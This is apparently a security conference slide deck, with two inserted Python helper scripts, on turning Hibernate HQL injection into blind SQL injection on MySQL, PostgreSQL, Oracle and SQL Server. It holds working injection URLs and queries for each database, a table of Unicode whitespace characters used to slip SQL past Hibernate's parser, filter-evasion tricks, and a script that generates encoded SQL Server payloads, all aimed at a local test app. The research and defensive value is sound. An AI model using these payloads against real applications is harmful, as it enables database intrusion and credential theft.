ORM2Pwn: Exploiting injections in Hibernate ORM


Mikhail Egorov 


Sergey Soldatov 


www.zeronights.org 


Short BIO - Mikhail Egorov

- Application Security Engineer at Odin [ http://www.odin.com ]
- Security researcher and bug hunter
- Graduated from BMSTU with MSc. in Information Security [IU8]
- Holds OSCP and CISSP certificates
- See my blog [ http://0ang3el.blogspot.com ]
Short BIO - Sergey Soldatov

- Chief infosecurity manager at a big corporation's IT insourcer
- GRC :) and "paper security"
- Security engineer and systems architect
- Security operations manager and analyst
- Amateur hacker / security researcher
- BMSTU's IU8
- CISA, CISSP
- http://reply-to-all.blogspot.ru/
Motivation

- Modern applications work with the DBMS not directly but via an ORM
- In Java, Hibernate is a popular ORM [ Red Hat project ]
- Hibernate uses HQL, which is very limited [ versus SQL ]
- HQLi exploitation is limited :(
Motivation

[ Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html ]

- Is it possible to exploit HQLi as SQLi for popular DBMSs?
- MySQL, PostgreSQL, Oracle, MS SQL Server are popular [ in our opinion :) ]
Chuck Norris can exploit SQLi even on static HTML pages


MySQL DBMS

- Hibernate escapes ['] in a string with [''] (quote doubling)
- MySQL escapes ['] in a string with [\'] (backslash escape)
MySQL DBMS

- What about the string 'abc\''or 1=(select 1)--' ?
- Hibernate: 'abc\''or 1=(select 1)--' [ the doubled quote '' is an escaped quote, so Hibernate thinks the whole thing is one string ]
- MySQL: 'abc\'' or 1=(select 1)--' [ the backslash escapes the first quote, the second quote closes the string, and the rest is executed as SQL ]
MySQL DBMS

- Navigate to URL

http://127.0.0.1:8080/app/dummy\''%20or%201<len(select%20version())--

- HQL query

SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy\'' or 1<len(select version())--'

- SQL query

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy\'' or 1<len(select version())--'
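The parser differential behind the MySQL slides, as an added example (it is not code from the talk or from the HQLi-playground): two small scanners find the end of the same single-quoted literal, one with Hibernate's rule (only '' is an escape) and one with MySQL's default rule (backslash escapes too). The payload is the one from the URL above, wrapped in the quotes the application adds. The caveat a practitioner wants: MySQL's NO_BACKSLASH_ESCAPES sql_mode turns off the backslash rule, in which case MySQL lexes like Hibernate and this particular trick fails.

```python
# Added example (not from the slides): model how Hibernate's HQL lexer and
# MySQL's SQL lexer each find the end of the same single-quoted string
# literal. The two disagree on the sequence \'' , which is what makes the
# HQLi-to-SQLi trick on the MySQL slides work.

def hql_string_end(s: str, start: int) -> int:
    """Return the index just past the HQL string literal opening at s[start].

    Hibernate (like the SQL standard) knows one escape inside a string: a
    doubled single quote '' stands for one literal quote. A backslash has no
    special meaning.
    """
    assert s[start] == "'"
    i = start + 1
    while i < len(s):
        if s[i] == "'":
            if i + 1 < len(s) and s[i + 1] == "'":
                i += 2          # '' is an escaped quote, keep scanning
                continue
            return i + 1        # a lone quote closes the literal
        i += 1
    raise ValueError("unterminated HQL string literal")


def mysql_string_end(s: str, start: int) -> int:
    """Same scan with MySQL's default rules (sql_mode without
    NO_BACKSLASH_ESCAPES): a backslash escapes the following character, and
    a doubled quote is still an escaped quote."""
    assert s[start] == "'"
    i = start + 1
    while i < len(s):
        if s[i] == "\\":
            i += 2              # \x is an escaped character, skip both
            continue
        if s[i] == "'":
            if i + 1 < len(s) and s[i + 1] == "'":
                i += 2
                continue
            return i + 1
        i += 1
    raise ValueError("unterminated MySQL string literal")


# PostgreSQL (standard_conforming_strings=on), Oracle and SQL Server escape
# quotes only by doubling, i.e. they agree with Hibernate. That is why the
# later slides report that the \' trick does not work against those three.
LEXERS = {
    "hibernate": hql_string_end,
    "mysql": mysql_string_end,
    "postgresql": hql_string_end,
    "oracle": hql_string_end,
    "mssql": hql_string_end,
}


def split_after_literal(s: str, lexer: str) -> tuple[str, str]:
    """Split s, which starts with a quote, into (literal, trailing text) as
    the named lexer would see it."""
    end = LEXERS[lexer](s, 0)
    return s[:end], s[end:]


def escapes_literal(user_input: str, lexer: str) -> bool:
    """True if user_input, once the application wraps it in quotes
    (p.name='<user_input>'), leaves text outside the string literal for the
    given lexer, i.e. part of it is parsed as code rather than data."""
    wrapped = "'" + user_input + "'"
    _, rest = split_after_literal(wrapped, lexer)
    return rest != ""


# The payload from the slide's URL, as the application embeds it into HQL.
PAYLOAD = "dummy\\'' or 1<len(select version())--"


if __name__ == "__main__":
    for name in LEXERS:
        lit, rest = split_after_literal("'" + PAYLOAD + "'", name)
        print(f"{name:10} literal={lit!r} rest={rest!r}")
```

Run it and the mysql line is the only one with a non-empty `rest`: Hibernate hands the whole payload to the database as one literal, MySQL closes the literal after `dummy\'` and executes the remainder.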
PostgreSQL DBMS

- Trick with \' not working
- Quote escaping with '' only [ not with \' ]
- HQL allows subqueries in the where clause
- Hibernate allows arbitrary function names in HQL
- PostgreSQL has a nice built-in: query_to_xml('SQL')

PostgreSQL DBMS

- query_to_xml('SQL') returns XML [ not usable directly ]
- Nevertheless it is possible to know whether the SQL returns 0 rows or > 0 [ xpath('row', ...) yields one array element per returned row ]:

array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1)
[ psql screenshot: the SQL returns 1 row (or more), array_upper = 1 ]

array_upper(xpath('row',query_to_xml('select 1 where 1337<1', true, false,'')),1)
[ psql screenshot: the SQL returns no rows, the xpath array is empty and array_upper is NULL ]
PostgreSQL DBMS

- Navigate to URL

http://127.0.0.1:8080/hqli.playground/dummy%27%20and%20array_upper%28xpath%28%27row%27%2Cquery_to_xml%28%27select%201%20where%201337%3E1%27%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%20and%20%271%27%3D%271

- HQL query

SELECT p FROM hqli.persistent.Post p where p.name='dummy' and array_upper(xpath('row',query_to_xml('select 1 where 1337>1',true,false,'')),1)=1 and '1'='1'

- SQL query

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and array_upper(xpath('row', query_to_xml('select 1 where 1337>1', true, false, '')), 1)=1 and '1'='1'
Oracle DBMS

- Trick with \' not working
- Quote escaping with '' [ not with \' ]
- Hibernate allows arbitrary function names in HQL
- Oracle has a nice built-in: DBMS_XMLGEN.getxml('SQL')

Oracle DBMS

- DBMS_XMLGEN.getxml('SQL') returns a CLOB or null [ null if the SQL returns no rows ]
- It is possible to know whether the SQL returns 0 rows or > 0 using the TO_CHAR and NVL built-ins:

NVL(TO_CHAR(DBMS_XMLGEN.getxml('SQL')),'1')!='1'

Oracle DBMS

- Navigate to URL

http://127.0.0.1:8080/app/dummy'%20and%20NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT%201337%20FROM%20dual%20where%201337>1')),'1')!='1'%20and%20'1'='1

- HQL query

SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')!='1' and '1'='1'

- SQL query [ Hibernate renders != as <> ]

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and NVL(to_char(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')<>'1' and '1'='1'
Microsoft SQL Server DBMS

- Trick with \' not working
- Quote escaping with '' only [ not with \' ]
- There are no usable functions like query_to_xml('SQL')

Microsoft SQL Server DBMS

- Hibernate ORM allows Unicode symbols in identifiers!!!

The ANTLR grammar for HQL parsing is here:
https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b0297f801daccfe85a9/hibernate-core/src/main/antlr/hql.

ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/


Microsoft SQL Server DBMS

- Hibernate ORM allows Unicode symbols in identifiers!!!

IDENT options { testLiterals=true; }
    : ID_START_LETTER ( ID_LETTER )*
        {
            // Setting this flag allows the grammar to use keywords as identifiers, if necessary.
            setPossibleID(true);
        }
    ;

protected
ID_START_LETTER
    :    '_'
    |    '$'
    |    'a'..'z'
    |    'A'..'Z'
    |    '\u0080'..'\ufffe'       // HHH-558 : Allow unicode chars in identifiers
    ;

protected
ID_LETTER
    :    ID_START_LETTER
    |    '0'..'9'
    ;
Microsoft SQL Server DBMS

- MS SQL Server allows Unicode delimiters in a query!!! There are many delimiters that work like the space [U+0020]:

LEN(U(selectU1)) [ U - a Unicode delimiter ]

- We've found them all with dumb fuzzing!!!
Microsoft SQL Server DBMS

- Here are the magic delimiters [U]:

Code point   URL-encoded (UTF-8)   Name
U+00A0       %C2%A0                No-break space
U+1680       %E1%9A%80             Ogham space mark
U+2000       %E2%80%80             En quad
U+2001       %E2%80%81             Em quad
U+2002       %E2%80%82             En space
U+2003       %E2%80%83             Em space
U+2004       %E2%80%84             Three-per-em space
U+2005       %E2%80%85             Four-per-em space
U+2006       %E2%80%86             Six-per-em space
U+2007       %E2%80%87             Figure space
U+2008       %E2%80%88             Punctuation space
U+2009       %E2%80%89             Thin space
U+200A       %E2%80%8A             Hair space
U+200B       %E2%80%8B             Zero width space
U+2028       %E2%80%A8             Line separator
U+2029       %E2%80%A9             Paragraph separator
U+202F       %E2%80%AF             Narrow no-break space
U+205F       %E2%81%9F             Medium mathematical space
U+3000       %E3%80%80             Ideographic space
Microsoft SQL Server DBMS

- Navigate to URL

http://127.0.0.1:8080/app/dummy%27%20or%201%3CLEN%28%C2%A0%28select%C2%A0top%C2%A01%C2%A0uname%C2%A0from%C2%A0postusers%29%29%20or%20%2731%27%3D%27143999

- HQL query

SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' or 1<LEN([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'

Hibernate sees here two function calls: LEN and [U+00A0]. The identifier select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers is passed as the function argument.

- Resulting SQL query

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'

Microsoft SQL Server DBMS

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'

is the same as [ SQL Server treats U+00A0 as whitespace ]

select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len((select top 1 uname from postusers)) or '31'='143999'
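The SQL Server payload above, rebuilt from its parts as an added example (not code from the talk, the playground or Hibernate): the IDENT / ID_START_LETTER / ID_LETTER rules quoted from hql.g are transcribed into a checker, every ASCII space in a T-SQL fragment is swapped for one of the 19 delimiters the slides list, and the result is percent-encoded the way a browser sends it. The /app/<post name> layout and the `or '31'='143999` tail come from the slide; the names `smuggle`, `mssql_len_condition` and `injected_path` are mine.

```python
# Added example (not from the slides): reproduce the SQL Server payload from
# the slide with the Unicode-whitespace trick and check each piece against
# the Hibernate IDENT rule quoted from hql.g. The application itself is not
# modelled; only the URL layout /app/<post name> follows the slide.

from urllib.parse import quote

# The 19 delimiters the slides found by fuzzing SQL Server.
MSSQL_UNICODE_DELIMITERS = (
    "\u00a0", "\u1680", "\u2000", "\u2001", "\u2002", "\u2003", "\u2004",
    "\u2005", "\u2006", "\u2007", "\u2008", "\u2009", "\u200a", "\u200b",
    "\u2028", "\u2029", "\u202f", "\u205f", "\u3000",
)


def is_id_start_letter(ch: str) -> bool:
    """ID_START_LETTER from hql.g: '_' | '$' | 'a'..'z' | 'A'..'Z' | '\\u0080'..'\\ufffe'."""
    return (ch == "_" or ch == "$"
            or "a" <= ch <= "z" or "A" <= ch <= "Z"
            or "\u0080" <= ch <= "\ufffe")


def is_id_letter(ch: str) -> bool:
    """ID_LETTER from hql.g: ID_START_LETTER | '0'..'9'."""
    return is_id_start_letter(ch) or "0" <= ch <= "9"


def is_hibernate_ident(token: str) -> bool:
    """Does the HQL lexer accept `token` as a single IDENT? The keyword
    check (testLiterals) runs afterwards on the whole token, so a token
    that contains a Unicode delimiter can never match a keyword."""
    return (bool(token)
            and is_id_start_letter(token[0])
            and all(is_id_letter(c) for c in token[1:]))


def smuggle(tsql: str, delimiter: str = "\u00a0") -> str:
    """Rewrite a T-SQL fragment so Hibernate lexes it as ONE identifier:
    every ASCII space becomes a Unicode delimiter that SQL Server still
    treats as whitespace. Raises if anything else in the fragment (quotes,
    parentheses, operators) would end the identifier."""
    if delimiter not in MSSQL_UNICODE_DELIMITERS:
        raise ValueError("not a delimiter SQL Server accepts")
    ident = tsql.replace(" ", delimiter)
    if not is_hibernate_ident(ident):
        raise ValueError("fragment is not a single Hibernate identifier: %r" % tsql)
    return ident


def mssql_len_condition(subquery: str, delimiter: str = "\u00a0") -> str:
    """The slide's shape. HQL sees LEN( <delimiter>( ident ) ), i.e. two
    function calls with an identifier argument; SQL Server sees
    1<LEN((subquery))."""
    return f"1<LEN({delimiter}({smuggle(subquery, delimiter)}))"


def injected_path(name: str, condition: str, tail: str = "or '31'='143999") -> str:
    """Percent-encode the post name as a browser would. The application's
    own closing quote terminates the last literal in `tail`."""
    return quote(f"{name}' or {condition} {tail}", safe="")


def mssql_sees(condition: str) -> str:
    """What SQL Server makes of the condition: every delimiter is plain whitespace."""
    for d in MSSQL_UNICODE_DELIMITERS:
        condition = condition.replace(d, " ")
    return condition


if __name__ == "__main__":
    cond = mssql_len_condition("select top 1 uname from postusers")
    print("http://127.0.0.1:8080/app/" + injected_path("dummy", cond))
    print("SQL Server sees:", mssql_sees(cond))
```

Any of the other 18 delimiters can be passed as `delimiter`; `smuggle` refuses fragments that need characters outside the identifier alphabet, which is exactly the limitation the "additional useful tricks" slide works around (no "=", no quotes, no lists).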
Microsoft SQL Server DBMS: additional useful tricks

Original                                   Replacement                                                                                       Why
where id=13                                where id like 13                                                                                  No "="
where field='data'                         where field like cast(0xDATA_IN_HEX as varchar)                                                   No "="; no "'"
where field not in ('data1','data2')       where 0 like charindex(concat('+',field,'+'), cast(0xDATA1DATA2_IN_HEX as varchar(MAX)))           No list
0xDATA_IN_HEX                              U0xDATA_IN_HEX                                                                                    int -> identifier [ U - Unicode delimiter ]
smth_known_to_hibernate(...)               Usmth_known_to_hibernate(...)                                                                     func -> identifier [ U - Unicode delimiter ]
substring((select...),N,1)='c'             N like charindex('c',(select...),N)
Hey, dude stop it! Show me the hack!

Video - https://www.youtube.com/watch?v=m MTWZptXUw
All demo scripts are here - https://github.com/0ang3el/Hibernate-Injection-Stud
Vulnerable App - https://github.com/0ang3el/HQLi-playground
Takeaways

- HQL injection is SQL injection [ exploit HQLi as blind SQLi ]
- Hibernate is not a WAF
- Our exploitation technique works because:
  - Hibernate allows arbitrary names for identifiers (function and argument names)
  - Hibernate allows Unicode symbols in identifiers
  - Hibernate escapes quotes ['] in strings by doubling them ['']
Questions?

[ SSMS screenshot: "SELECT TOP 1000 [uid], [uname], [password], [comment] FROM [hqli].[dbo].[Postusers]" run against the hqli database (tables dbo.Post, dbo.Table_1, dbo.Postusers); the result grid lists the users jlennon, pmccartney, gharrison, admin and ad with hashed passwords and NULL comments ]